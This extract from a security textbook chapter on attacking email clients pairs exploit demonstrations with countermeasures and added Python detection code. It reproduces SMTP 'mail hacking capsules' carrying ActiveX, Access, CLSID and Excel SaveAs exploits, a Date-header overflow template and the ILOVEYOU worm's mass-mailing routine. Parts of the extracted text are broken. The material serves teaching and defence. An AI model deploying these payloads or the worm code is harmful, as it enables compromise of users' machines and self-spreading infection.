Network Security Secrets and Solutions, Scambray and McClure, part 10 (PDF)

628
Hacking Exposed: Network Security Secrets and Solutions
helo somedomain.com
mail from: <>
rcpt to: <>
data
subject: Read this!
Importance: high
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="_boundary1_"

--_boundary1_
Content-Type: multipart/alternative; boundary="_boundary2_"

--_boundary2_
Content-Type: text/html; charset=us-ascii

<HTML>
<h2>Hello World!</h2>
</HTML>
--_boundary2_--
--_boundary1_
Content-Type: application/octet-stream; name="plant.txt"
Content-ID: <5551212>
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="plant.txt"
Content-MD5: Psn+mcJEv0fPwoEc4OXYTA==

SSBjb3VsZGEgaGFja2VkIHlhIGJhZCANCg==
--_boundary1_--
.
quit
Piping this through netcat to an open SMTP server will deliver an HTML-formatted message, with the file plant.txt attached, to the recipient. For a better understanding of MIME boundaries in multipart messages, see RFC 2046 Section 5.1.1. It might also be informative to examine a test message sent to Outlook Express. Click Properties | Details | Message Source to view the raw data (Outlook won’t let you see all the raw SMTP data).
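As an added example (not from the book), the following Python walks the multipart structure of a capsule like the one above with the standard email library, decodes the base64 attachment and checks it against its Content-MD5 header. The sample message is constructed inline, with the RFC 2046 delimiters written out in full.

```python
import base64
import hashlib
from email import message_from_string, policy

# Constructed sample: the multipart capsule from the text, reduced to the
# message itself (the SMTP dialogue is not part of the message), with the
# RFC 2046 delimiters written out as "--boundary" / "--boundary--".
CAPSULE = (
    "Subject: Read this!\r\n"
    "Importance: high\r\n"
    "MIME-Version: 1.0\r\n"
    'Content-Type: multipart/mixed; boundary="_boundary1_"\r\n'
    "\r\n"
    "--_boundary1_\r\n"
    'Content-Type: multipart/alternative; boundary="_boundary2_"\r\n'
    "\r\n"
    "--_boundary2_\r\n"
    "Content-Type: text/html; charset=us-ascii\r\n"
    "\r\n"
    "<HTML>\r\n<h2>Hello World!</h2>\r\n</HTML>\r\n"
    "--_boundary2_--\r\n"
    "--_boundary1_\r\n"
    'Content-Type: application/octet-stream; name="plant.txt"\r\n'
    "Content-ID: <5551212>\r\n"
    "Content-Transfer-Encoding: base64\r\n"
    'Content-Disposition: inline; filename="plant.txt"\r\n'
    "Content-MD5: Psn+mcJEv0fPwoEc4OXYTA==\r\n"
    "\r\n"
    "SSBjb3VsZGEgaGFja2VkIHlhIGJhZCANCg==\r\n"
    "--_boundary1_--\r\n"
)


def leaf_parts(raw):
    """List (content type, disposition, filename) for each non-multipart part."""
    msg = message_from_string(raw, policy=policy.default)
    return [
        (p.get_content_type(), p.get_content_disposition(), p.get_filename())
        for p in msg.walk()
        if not p.is_multipart()
    ]


def extract_attachments(raw):
    """Decode every non-text leaf part and check its Content-MD5 if present.

    Returns a list of dicts holding the decoded bytes and an md5_ok flag
    (None when the part carried no Content-MD5 header).
    """
    msg = message_from_string(raw, policy=policy.default)
    found = []
    for part in msg.walk():
        if part.is_multipart() or part.get_content_maintype() == "text":
            continue
        payload = part.get_payload(decode=True)   # undoes the base64 encoding
        header = part.get("Content-MD5")
        md5_ok = None
        if header is not None:
            digest = base64.b64encode(hashlib.md5(payload).digest()).decode()
            md5_ok = digest == str(header).strip()
        found.append({"filename": part.get_filename(),
                      "payload": payload, "md5_ok": md5_ok})
    return found
```

A mail gateway can apply the same walk to every inbound message and quarantine parts whose declared name, type or digest do not agree.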
Chapter 16: Hacking the Internet User
629
We’ll refer to this method throughout this chapter as a “mail hacking capsule.” Let’s
apply this general technique to some specific attacks found in the wild to demonstrate the
risk level “mailicious” email actually represents.
Generic Mail Hacking Countermeasures
Obviously, rendering of HTML mail should be disabled within mail client software. Unfortunately, this is difficult or impossible with most modern email clients. Additional web “features” that should definitely be disabled in email are mobile code technologies. We’ve already discussed how to do this in the section on security zones earlier, but we’ll reiterate it here so the message sinks in. For both Microsoft Outlook and Outlook Express, set Zone under Secure Content to Restricted Sites under Tools | Options | Security, as shown in Figure 16-2 (recall that these settings will not apply to web browsing with IE, which uses its own settings). This single setting takes care of most of the problems identified next. It is highly recommended.
And, of course, safe handling of mail attachments is critical. Most people’s first instinct is to blame the vendor for problems like the ILOVEYOU virus (see next), but the reality is that almost all mail-borne malware requires some compliance on the part of the user. The Outlook patch available at …/downloadDetails/Out2ksec.htm makes it even harder for users to automatically launch attachments, forcing them to click through at least two dialog boxes before executing an attachment (coincidentally, it also sets the security zone to Restricted Sites). It isn’t foolproof, as we will see next, but it raises the bar significantly for would-be attackers. Raise the bar all the way by using good judgment: don’t open messages or download attachments from people you don’t know!
Executing Arbitrary Code Through Email
The following attacks demonstrate many different mechanisms for executing commands
on the victim’s machine. Many of these are activated simply by opening the malicious
message or previewing it in Outlook/OE’s preview pane.
“Safe for Scripting” Mail Attacks
Popularity: 5
Simplicity: 6
Impact: 10
Risk Rating: 7
Attacks don’t get much more deadly than this: all the victim has to do is read the message (or view it in the preview pane if Outlook/OE is configured to do so). No intervention by the user is required. This wonderful nastiness is brought to you again by the Scriptlet.typelib ActiveX control that is marked “safe for scripting,” as discussed in the previous section on ActiveX. Eyedog.ocx could just as easily be used, but this specific exploit is based on Georgi Guninski’s proof-of-concept code using Scriptlet.typelib. Here is a slightly modified version of his code pasted into a mail hacking capsule:
helo somedomain.com
mail from: <>
rcpt to: <>
data
subject: Ya gotta read this!
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit

If you have received this message in error, please delete it.
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\WIN98\\start menu\\programs\\startup\\guninski.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(' Written by Georgi Guninski
scr.write();
</SCRIPT>
</object>
.
quit
This code performs a two-step attack. First, it creates an HTML Application file (extension .HTA) in the user’s Startup folder and writes the payload of the script to it. The creation of the file occurs silently and almost invisibly to users as soon as they preview the message (they might catch the disk-drive-activity light fluttering if they’re watching extremely closely). Here’s what our test message looks like in the user’s inbox (Outlook Express is depicted here). This is all that has to happen for the attack to be completed: viewing the message in the preview pane.
The second step comes when the user inevitably reboots the machine (the script could reboot the user’s computer also, of course). The .HTA file is executed at startup (.HTA files are automatically interpreted by the Windows shell). In our example, the user is greeted by the following pop-up message:
This is quite a harmless action to have performed, out of an almost limitless range of possibilities. The victim is completely at the mercy of the attacker here.
The so-called KAK worm is based on exploitation of the Scriptlet vulnerability and may also be used to prey upon unwary (and unpatched) Outlook/OE users; more information on KAK is available in the published advisories.
“Safe for Scripting” Countermeasures
Obtain the patch for the Scriptlet/Eyedog ActiveX components, available at http://www.microsoft.com/technet/security/bulletin/ms99-032.asp.
It is important to note, once again, that this only corrects the problem with Scriptlet
and Eyedog. For true security, disable ActiveX for mail readers as discussed earlier in the
section on security zones.
Executing MS Office Documents Using ActiveX
Popularity: 5
Simplicity: 5
Impact: 10
Risk Rating: 7
Georgi Guninski didn’t stop when he exploited ActiveX tags embedded within HTML email messages to load potentially dangerous ActiveX controls. Subsequent advisories posted to his site noted that potentially dangerous Microsoft Office documents could also be launched using the same technique (Office docs behave much like ActiveX controls themselves). These findings are covered at …/sheetex-desc.html (for Excel and PowerPoint documents) and in a second advisory covering the launching of Visual Basic for Applications (VBA) code within Access databases.

We’ll discuss the second of these findings here for two reasons. One, the Excel/PowerPoint issue is actually more interesting for its ability to write files surreptitiously to disk, which we discuss in an upcoming section. Secondly, the Access-based vulnerability is more severe in the opinion of many in the security community because it circumvents any security mechanisms applied to ActiveX by the user—that’s right, even if ActiveX is completely disabled, you are still vulnerable. The severity of this problem was judged to be so great by the SANS Institute that they termed it “probably the most dangerous programming error in Windows workstation (all varieties—95, 98, 2000, NT 4.0) that Microsoft has made” (see the SANS Institute’s alert). The sad part is, this seeming sensationalism may be on target.
The problem lies in the checks that Windows performs when an Access file (.MDB) is loaded within IE from an object tag, as shown in the snippet of HTML proposed by Georgi Guninski, next:
<OBJECT data="db3.mdb" id="d1"></OBJECT>
As soon as IE encounters the object tag, it downloads the Access database specified in
the “data=“ parameter, then calls Access to open it. It does this before warning the user
about the potential for any damage caused by running the database. Thus, the database
launches whether IE/Outlook/OE has been configured to execute ActiveX controls or
not. Ugh.
Georgi’s exploit relies on a remote file hosted by his web site called db3.mdb. It is an
Access database containing a single form that launches Wordpad. Here is another mail
hacking capsule demonstrating how this attack would be carried out in practice:
helo somedomain.com
mail from: <>
rcpt to: <>
data
subject: And another thing!
Importance: high
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii

<HTML>
<h2>Enticing message here!</h2>
<OBJECT data="…/db3.mdb" id="d1"></OBJECT>
</HTML>
.
quit
We have provided an explicit URL reference in this example to Georgi’s db3.mdb file
so that it will work via email (line 12). SANS claimed to have used an SMB share over the
Internet to get the Access file. The mind boggles—how many FTP servers do you know
about that permit unsupervised puts and gets? We discuss other repositories that could
be used by attackers next.
The key point here is that by rendering this simple tag, IE/Outlook/OE downloads
and launches a file containing a powerful VBA macro without any user input. Is anyone
not scared by this?
Countermeasure: Define an Access Admin Password
Disabling ActiveX will not stop this Access exploit, so it must be patched according to Microsoft’s instructions. We draw particular attention to the patch specifically for the Access-related issue (Microsoft calls it the “IE Script” vulnerability), which can be found at …/windows/ie/download/critical/patch11.htm.
Microsoft recommended a work-around that is also good to apply whether the patch is applied or not. The work-around is to set an Admin password for Access (by default it is blank), as follows:
1. Start Access 2000 but don’t open any databases.
2. Choose Tools | Security.
3. Select User And Group Accounts.
4. Select the Admin user, which should be defined by default.
5. Go to the Change Logon Password tab.
6. The Admin password should be blank if it has never been changed.
7. Assign a password to the Admin user.
8. Click OK to exit the menu.
This should prevent rogue VBA code from running with full privileges. SANS also
notes that blocking outgoing Windows file sharing at the firewall (TCP 139 and TCP 445)
will reduce the possibility of users being tricked into launching remote code.
Executing Files Using a Nonzero ActiveX CLSID Parameter
Popularity: 5
Simplicity: 5
Impact: 10
Risk Rating: 7
The basis of this vulnerability was an almost offhand remark in a Bugtraq thread concerning the malware.com “force feeding” vulnerability (see next). Weld Pond, hacker extraordinaire of the L0pht and netcat NT fame (Chapter 5), chimed in on behalf of his colleague DilDog, of Cult of the Dead Cow and Back Orifice 2000 fame (Chapters 4 and 14), to provide a mechanism for executing files force-fed to users via the malware.com technique. By configuring an ActiveX OBJECT tag with a nonzero CLSID parameter into the body of a malicious email message, any file on disk can be executed. This frightening proposal makes any executable on the user’s disk a potential target. Here’s a sample mail hacking capsule:
helo somedomain.com
mail from: <>
rcpt to: <>
data
subject: Read this!
Importance: high
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii

<HTML>
<HEAD>
</HEAD>
<BODY>
<OBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000'
CODEBASE='c:\windows\calc.exe'></OBJECT>
</BODY></HTML>
.
quit
Note the nonzero CLSID parameter. This is what makes the exploit tick. The file to be
executed is simply listed in the CODEBASE parameter.
However, in our testing we noted that several planets had to be in alignment for this to work. Primarily, on Outlook Express 5.00.2615.200, we had to set the security zone to Low, and we were still prompted with a dialog box to execute an unsigned control when we tried to launch calc.exe in the System folder. Users would have to be pretty clueless to fall for this one, but it’s an intriguing start, especially when taken together with the capability to write files to disk as supplied by malware.com.
Nonzero CODEBASE Countermeasure
Based on our testing, setting security zones to an appropriate level takes care of this problem (see the discussion of security zones earlier).
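As an added example (not from the book), the following Python scans an HTML mail body for the markers that the Scriptlet, Access and nonzero-CLSID capsules above all depend on: a SCRIPT block, an OBJECT tag carrying a CLSID, an OBJECT data attribute naming an .mdb file, a CODEBASE that points at a local path, and the META refresh redirect used by the force-feeding technique. The CLSID table and the sample bodies are constructed here from values on the page; a gateway or client-side filter could use the same scan to strip or quarantine such messages.

```python
import re
from html.parser import HTMLParser

# CLSIDs named in the text: the Scriptlet.typelib control marked "safe for
# scripting" and the Windows Script Host shell object it instantiates.
KNOWN_CLSIDS = {
    "06290BD5-48AA-11D2-8432-006008C3FBFC": "Scriptlet.typelib",
    "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B": "WScript.Shell",
}
LOCAL_PATH = re.compile(r"^(?:[a-zA-Z]:\\|\\\\)")   # c:\... or \\server\share


class ActiveContentScanner(HTMLParser):
    """Collects findings about tags a mail reader should never act on."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {name: (value or "") for name, value in attrs}
        if tag == "script":
            self.findings.append("script-block")
        elif tag == "object":
            clsid = a.get("classid", "").upper().replace("CLSID:", "").strip("{} ")
            if clsid:
                self.findings.append(
                    f"object-classid:{clsid}:{KNOWN_CLSIDS.get(clsid, 'unknown')}")
            data = a.get("data", "")
            if data.lower().endswith(".mdb"):        # Access database launch
                self.findings.append(f"object-data-mdb:{data}")
            codebase = a.get("codebase", "")
            if LOCAL_PATH.match(codebase):            # nonzero-CLSID trick
                self.findings.append(f"object-local-codebase:{codebase}")
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append(f"meta-refresh:{a.get('content', '')}")


def scan_html_mail(html):
    """Return the list of findings for one HTML message body."""
    scanner = ActiveContentScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample bodies modelled on the capsules in the text.
BENIGN = "<HTML>\n<h2>Hello World!</h2>\n</HTML>\n"
SCRIPTLET = (
    '<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">'
    "</object>\n<SCRIPT>\nscr.Reset();\nscr.write();\n</SCRIPT>\n"
)
ACCESS = '<OBJECT data="db3.mdb" id="d1"></OBJECT>'
CALC = (
    "<HTML><BODY>\n"
    "<OBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000'\n"
    "CODEBASE='c:\\windows\\calc.exe'></OBJECT>\n"
    "</BODY></HTML>\n"
)
REFRESH = '<META HTTP-EQUIV="refresh" content="2;URL=http://www.othersite.com">'
```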
Outlook/OE Date Field Buffer Overflow
Popularity: 7
Simplicity: 9
Impact: 10
Risk Rating: 10
Does it seem that ActiveX lies at the heart of most of these exploits? In a July 18, 2000, post to Bugtraq, a different sort of Outlook/OE vulnerability was announced that didn’t have anything to do with ActiveX. This problem was a classic buffer overflow issue caused by stuffing the GMT section of the date field in the header of an email with an unexpectedly large amount of data. When such a message is downloaded via POP3 or IMAP4, the INETCOMM.DLL file responsible for parsing the GMT token does not perform proper bounds checking, causing Outlook/OE to crash and making arbitrary code execution possible. Sample exploit code based on that posted to Bugtraq is shown next:
Date: Tue, 18 July 2000 14:16:06 +<approx. 1000 bytes><assembly code to execute>
As we have explained many times in this book, once the execution of arbitrary commands is achieved, the game is over. A “mailicious” message could silently install Trojans, spread worms, compromise the target system, launch an attachment—practically anything.
OE users would merely have to open a folder containing a malicious email in order to become vulnerable, and typically the act of simply downloading such a message while checking mail would cause the crash/overflow. OE users are then kind of stuck—the message never successfully downloads, and the exploit will crash the program on every subsequent attempt to retrieve mail. One work-around is to use a non-Outlook/OE mail client to retrieve the mail and delete it (assuming you can tell which messages are the right ones…). Netscape Messenger does a handy job of this, displaying the date field in the preview pane to indicate which are the offending messages. Outlook users are vulnerable if they preview, read, reply, or forward an offending message.
Initially, exploit code was posted to Bugtraq, until it was later revealed that this example was hard-coded to work against a server on a private LAN, and thus would not function when mailed to Internet-connected users. It seems the post was made mistakenly by Aaron Drew, who apparently was attempting to use a technique similar to the mail hacking capsule we’ve outlined in this chapter when he inadvertently sent a message to Bugtraq instead. For the record, such a message would look something like this (note the Date line—the overflow has been omitted for brevity, enclosed here by square brackets that are not necessary in the actual exploit):
helo somedomain.com
mail from: <>
rcpt to: <>
data
Date: Sun, 7 May 2000 11:20:46 +[~1000bytes + exploit code in hex or ascii]
Subject: Date overflow!
Importance: high
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii

This is a test of the Outlook/OE date field overflow.
.
quit
Underground Security Systems Research (USSR) also claimed credit for discovering this flaw (or at least hearing about it from a hacker named Metatron), but said they waited until Microsoft had prepared a patch before going public. USSR posted their exploit, which opened up a connection to their web site. It can be executed in almost exactly the same way as shown earlier.
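As an added example (not from the book), here is a Python check that a mail relay or a non-Outlook retrieval script could run before a message reaches an unpatched Outlook/OE client: it unfolds the Date header and measures the zone token after the time, flagging anything far larger than a legitimate offset. The two sample messages are constructed here, with filler bytes standing in for the overflow described above.

```python
import re

# Constructed sample messages (the DATA portion of the SMTP dialogue only).
SAFE_MESSAGE = (
    "Date: Tue, 18 Jul 2000 14:16:06 +0100 (CET)\r\n"
    "Subject: ordinary mail\r\n"
    "MIME-Version: 1.0\r\n"
    "Content-Type: text/plain; charset=us-ascii\r\n"
    "\r\n"
    "Nothing to see here.\r\n"
)
# Same shape as the capsule in the text: the zone after "+" is stuffed with
# ~1000 filler bytes where a real exploit would carry its payload.
OVERFLOW_MESSAGE = (
    "Date: Sun, 7 May 2000 11:20:46 +" + "A" * 1000 + "\r\n"
    "Subject: Date overflow!\r\n"
    "Importance: high\r\n"
    "MIME-Version: 1.0\r\n"
    "Content-Type: text/plain; charset=us-ascii\r\n"
    "\r\n"
    "This is a test of the Outlook/OE date field overflow.\r\n"
)

# Anything longer than this after the time cannot be a genuine zone:
# "+0100", "GMT" and "+0100 (CET)" all fit with room to spare.
MAX_ZONE_BYTES = 32
TIME_RE = re.compile(r"\b\d{1,2}:\d{2}(?::\d{2})?\s*")


def header_value(raw, name):
    """Return the unfolded value of the first header called `name`, or None."""
    head = raw.split("\r\n\r\n", 1)[0]
    value = None
    for line in head.split("\r\n"):
        if value is not None:
            if line[:1] in (" ", "\t"):      # folded continuation line
                value += " " + line.strip()
                continue
            break
        if line.lower().startswith(name.lower() + ":"):
            value = line.split(":", 1)[1].strip()
    return value


def date_zone_token(date_value):
    """Everything after the HH:MM[:SS] time in a Date value is the zone."""
    m = TIME_RE.search(date_value)
    return date_value[m.end():].strip() if m else ""


def oversized_date_zone(raw, limit=MAX_ZONE_BYTES):
    """True when the Date header's zone is too long to be a real offset."""
    date = header_value(raw, "Date")
    if date is None:
        return False
    return len(date_zone_token(date)) > limit
```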
Countermeasure for Date Field Overflow
According to the bulletin posted by Microsoft at …/security/bulletin/MS00-043.asp, the vulnerability can be patched by installing the fix linked from that bulletin. It can also be eliminated by a default installation of either of the following upgrades:
• Internet Explorer 5.01 Service Pack 1
• Internet Explorer 5.5 on any system except Windows 2000
A nondefault installation of these upgrades will also eliminate this vulnerability, as long as an installation method is chosen that installs upgraded Outlook Express components (the user should be prompted about this during the installation process).
When installed on a Windows 2000 machine, IE 5.5 does not install upgraded Outlook Express components and therefore does not eliminate the vulnerability.
Also note that Microsoft stated that Outlook users who have configured Outlook to use only MAPI services would not be affected, regardless of what version of Internet Explorer they have installed. INETCOMM.DLL is not used when Internet E-mail services is not installed under Tools | Services.
Outlook Address Book Worms
During the last years of the 20th century, the world’s malicious code jockeys threw a wild New Year’s party at the expense of Outlook and Outlook Express users. A whole slew of worms was released that was based on an elegant technique for self-perpetuation: by mailing itself to every entry in each victim’s personal address book, the worm masqueraded as originating from a trusted source. This little piece of social engineering (see Chapter 14) was a true stroke of genius. Corporations that had tens of thousands of users on Outlook were forced to shut down mail servers to triage the influx of messages zipping back and forth between users, clogging mailboxes and straining mail server disk space. Who could resist opening attachments from someone they knew and trusted?
The first such email missile was called Melissa, and though David L. Smith, the al-
leged author of Melissa, was caught and eventually pleaded guilty to a second-degree
charge of computer theft that carried a five- to ten-year prison term and up to a $150,000
fine, people kept spreading one-offs for years. Such household names as Worm.Ex-
plore.Zip, BubbleBoy, and ILOVEYOU made the rounds until the media seemed to get
tired of sensationalizing these exploits late in 2000. The threat still persists, however, and
it is one that needs to be highlighted.
The ILOVEYOU Worm
Popularity: 5
Simplicity: 5
Impact: 10
Risk Rating: 7
Here is the pertinent Visual Basic Script language (VBScript) subroutine from the ILOVEYOU worm that caused it to spread via email (some lines have been manually broken to fit the page):
sub spreadtoemail()
On Error Resume Next

dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software
\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next

regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
This simple 37-line routine invokes the Messaging Application Programming Interface (MAPI) to scour the Windows Address Book (WAB) in the Registry, and creates a mail item with the subject “ILOVEYOU” and message body “kindly check the attached LOVELETTER coming from me” for each recipient it finds there. (Thanks to Brian Lewis of Foundstone Inc. for help with the code analysis.) In case any nonprogrammers out there think this is rocket science, let us remind you that ILOVEYOU was based on an academic thesis paper written by a 23-year-old college student. Who knows how much damage could have been done?
Stopping Address Book Worms
After years of abuse in the media, Microsoft tired of pointing out that users were ultimately to blame for launching email attachments containing such worms and released a patch. The patch was called the Outlook 2000 SR-1 E-mail Security Update and the Outlook 98 E-mail Security Update (see …/Out2ksec.htm and …/Out98sec.htm, respectively). One feature of this three-pronged fix was the Object Model Guard, which was designed to prompt users whenever an external program attempted to access their Outlook Address Book or send email on the user’s behalf.
Reliable Software Technologies Corporation (RSTCorp) released an add-on utility that stops certain calls to Outlook by monitoring the Visual Basic Scripting Engine, thereby stopping the spread of viruses like ILOVEYOU. The patch, called JustBeFriends.dll (JBF), can be used in conjunction with Microsoft’s update for Outlook. In contrast to Microsoft’s Object Model Guard, which works by controlling access to functions within Outlook that can be used to gather email addresses or send emails, JBF “works by controlling the ability of other applications to access Outlook or Outlook Express. In the event that the access comes from a script being run from the desktop or from an attachment, the access is denied. Otherwise, the user is asked to confirm that the application should be allowed access to Outlook” (taken from the Technical Details on JBF at …/jbf/tech.html).
RSTCorp claims that their approach is superior, since Microsoft’s Object Model Guard must protect an exhaustive list of objects if it is to be successful, a challenging task. They also note that email addresses may still be exposed if they appear in signatures, message bodies, or other documents, and that “future methods for exploiting flaws in Outlook to send e-mails are likely to be found.” By gating script-based access to Outlook/OE, JBF theoretically can prevent new attacks based on a wide range of related attack techniques.
JustBeFriends can be obtained from RSTCorp. We wish it were packaged as separate files instead of a monolithic installer (so much for engendering trust), but we nevertheless recommend it for Outlook/OE users on NT/2000 platforms. JustBeFriends does not work on Win 9x platforms.
File Attachment Attacks
One of the most convenient features of email is the ability to attach files to messages. This great timesaver has obvious drawbacks, however—namely, the infallible propensity of users to execute just about any file they receive via email. No one seems to recall that this is equivalent to inviting the bad guys right into your living room.
Next we will discuss many attacks that leverage files attached to email messages. Many revolve around mechanisms for disguising the nature of the attached file or making it irresistibly attractive to the victim’s mouse-clicking finger. Other attacks we discuss are much more insidious, actually writing attached files to disk without any user intervention or knowledge. Most Internet users know to handle email attachments extremely carefully and with great skepticism—we hope the following section reinforces this concept to the hilt.
Scrap File Attachment Attacks
Popularity: 5
Simplicity: 5
Impact: 10
Risk Rating: 7
A little-known secret of Windows is that files with the extension .SHS have their real file extension hidden by default according to the Registry setting HKEY_CLASSES_ROOT\ShellScrap\NeverShowExt. This probably wouldn’t be that big a deal, except that .SHS files, also known as scrap files or Shell Scrap Objects, can execute commands. Based on Object Linking and Embedding (OLE) technology discussed in the previous section on ActiveX, scrap files are essentially a wrapper for another embedded object. Objects can be Excel spreadsheets (which most people have seen embedded in Word documents) or even other files. The easiest way to create one is to embed a file into another OLE-compliant application (try Wordpad) and then to copy its icon to another folder. The file is now contained in its very own wrapper file, with its own special icon and a unique extension (SHS). When the SHS file is launched, the embedded object is also executed. What’s more, commands can be associated with the embedded object using Microsoft’s Object Packager, opening up the entire realm of malicious activities to anyone halfway familiar with DOS.
In June 2000, someone launched a worm called LifeChanges that leveraged these features of scrap files to attack users. The worm was vectored by email with a varying subject line referring to jokes contained in the attached file. The file attachment was a scrap file with a fraudulent .TXT extension, making it seem like a common text file (the default scrap file icon even looks like a text file). Once executed, LifeChanges performed the standard routines: mailed itself to the first 50 recipients of the victim’s address book, deleted files, and so on. It was startling to see someone base an attack so clearly on the malicious features of scrap files that had been known for years, and most entertainingly chronicled on the PCHelp web site. Who knows how many other land mines like this one lie in wait in the Windows Registry?
Scrap File Countermeasures
Some excellent advice for blunting the most dangerous aspects of scrap files is available on PCHelp, including the following:
• Delete the NeverShowExt Registry value referenced earlier and from under HKLM\SOFTWARE\Classes\DocShortcut, thus making SHS and SHB extensions visible in Windows. (SHB files perform similarly to SHS.)
• Update antivirus scanners to look at SHS and SHB files in addition to other executable file types.
• Disable scrap files entirely by either removing them from the list of known Windows file types or by deleting the shscrap.dll file in your System folder.
Hiding Mail Attachment Extensions by Padding with Spaces
Popularity: 7
Simplicity: 8
Impact: 9
Risk Rating: 8
In a post to the Incidents mailing list (URL) on May 18, 2000, Volker Werth reported a
method for sending mail attachments that cleverly disguised the name of the attached file.
By padding the filename with spaces (%20 in hex), mail readers can be forced to display
only the first few characters of the attachment name in the user interface. For example:
freemp3.doc . . . [150 spaces] . . . .exe
This attachment appears as freemp3.doc in the UI, a perfectly legitimate-looking file that
might be saved to disk or launched right from the email. Here’s a screen shot of what this
looks like in Outlook Express:
Hidden File Attachment Countermeasure
As you can see by the icon in the preceding illustration, the file attachment is plainly not a Word document. The telltale trailing ellipsis (…) also helps to give this away. If these signs aren’t enough, you shouldn’t be opening attachments directly from email messages anyway! The Outlook SR-1 Security patch can help with this—it forces you to save most harmful file attachment types to disk (see …/downloadDetails/Out2ksec.htm).
Social Techniques for Cajoling Attachment Download
Popularity: 10
Simplicity: 10
Impact: 10
Risk Rating: 10
The direct approach to writing a mail attachment to disk is social engineering. Ever see this text appear in the body of an email?
“This message uses a character set that is not supported by the Internet Service. To view the original message content, open the attached message. If the text doesn’t display correctly, save the attachment to disk, and then open it using a viewer that can display the original character set.”
This is a standard message created when mail messages (in .EML format) are forwarded to Outlook users and some error occurs with the MIME handling of the enclosed/forwarded message. It strikes us that this is an almost irresistible technique for getting someone to launch an attachment (either directly or after saving to disk). We’ve actually received such messages sent from the listservers of very prominent security mailing lists! Of course, this is one of an unlimited range of possibilities that attackers could insert into the body or subject field of a message. Don’t be fooled!
File Attachment Trickery Countermeasure
Your mouse-clicking finger is the only enemy here—teach it to behave and scan downloaded attachments with virus-scanning software before launching them. Even then, take a serious look at the sender of the email before making the decision to launch, and be aware that mail worms like ILOVEYOU can masquerade as your most trusted friends.
Writing Attachments to Disk Without User Intervention
To this point, we’ve talked about several mechanisms for executing files that might lie on a
remote user’s disk, and the attacks listed so far have generally relied on existing executables
to perform their dirty work (either on the remote server or on a local user’s disk). However,
what if an attacker also had the ability to write files to the victim’s disk? This would provide
a complete methodology for delivering a payload and then detonating it.
Hijacking Excel/PowerPoint’s SaveAs Function
Popularity: 5
Simplicity: 5
Impact: 8
Risk Rating: 6
The magic behind this attack comes from Georgi Guninski’s observation that MS Excel and PowerPoint have a SaveAs function (see …/sheetex-desc.html). Thus, once an Office document is called within IE using the object tag (as we have seen before), it exposes the ability to save data to any arbitrary location on disk. Georgi’s exploit extracts the data to be saved directly from a file called Book1.xla, which is a simple Excel file renamed to xla. Georgi uses the xla extension so that the file is executed by Windows at boot time if placed in the Startup folder.
A slightly modified version of Georgi’s complete exploit encapsulated in our mail hacking format is shown next:
helo somedomain.com
mail from: <>
rcpt to: <>
data
subject: Check this out!
Importance: high
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii

<HTML>
<h2>Enticing message here!</h2>
<object data="…/Book1.xla" id="sh1" width=0 height=0>
</object>
<SCRIPT>
function f()
{
fn=" D:\\test\\georgi-xla.hta";
sh1.object.SaveAs(fn,6);
alert(fn+" successfully written");
}
setTimeout("f()",5000);
</SCRIPT>
</HTML>
.
quit
Georgi’s code is contained between the <object> and </SCRIPT> tags. We have modified
it to access his Book1.xla file using its full URL (his original exploit had the file available
directly on the web server). The content of Book1.xla is written to the file specified in the
“fn=“ line. We also removed some commented lines from Georgi’s original code that
showed how you could save the file to the Windows Startup folder (we think you get the
point). Previewing this message in OE on NT4 with the security zone set at Low first pops
up a brief file transfer window, then the following message:
We’re lazy and used Georgi’s pre-built Book1.xla file as raw material here. It is harmless (containing only a couple lines of code that execute “Hello world” in a DOS shell window). However, with the growth of free and anonymous file repository services on the Internet, it would be simple for malicious attackers to create their own malicious Office document and make it available for download. Misconfigured or compromised web or FTP servers would also make for a ripe depot for such files.
U
Countermeasure for Excel/PowerPoint File Writing Attacks
Need we say it again? Obtain the relevant patch, described in Microsoft Security Bulletin MS00-049 (technet/security/bulletin/MS00-049.asp). This patch marks the Excel and PowerPoint objects as "unsafe for scripting" (no snickering, please), so that IE will no longer let script on a page call their methods. Of course, you could stop putting Band-Aids all over your computer and staunch the bleeding entirely by disabling ActiveX in the appropriate manner, as described in the discussion on security zones earlier.
]
Force Feeding Attachments
Popularity: 5
Simplicity: 2
Impact: 8
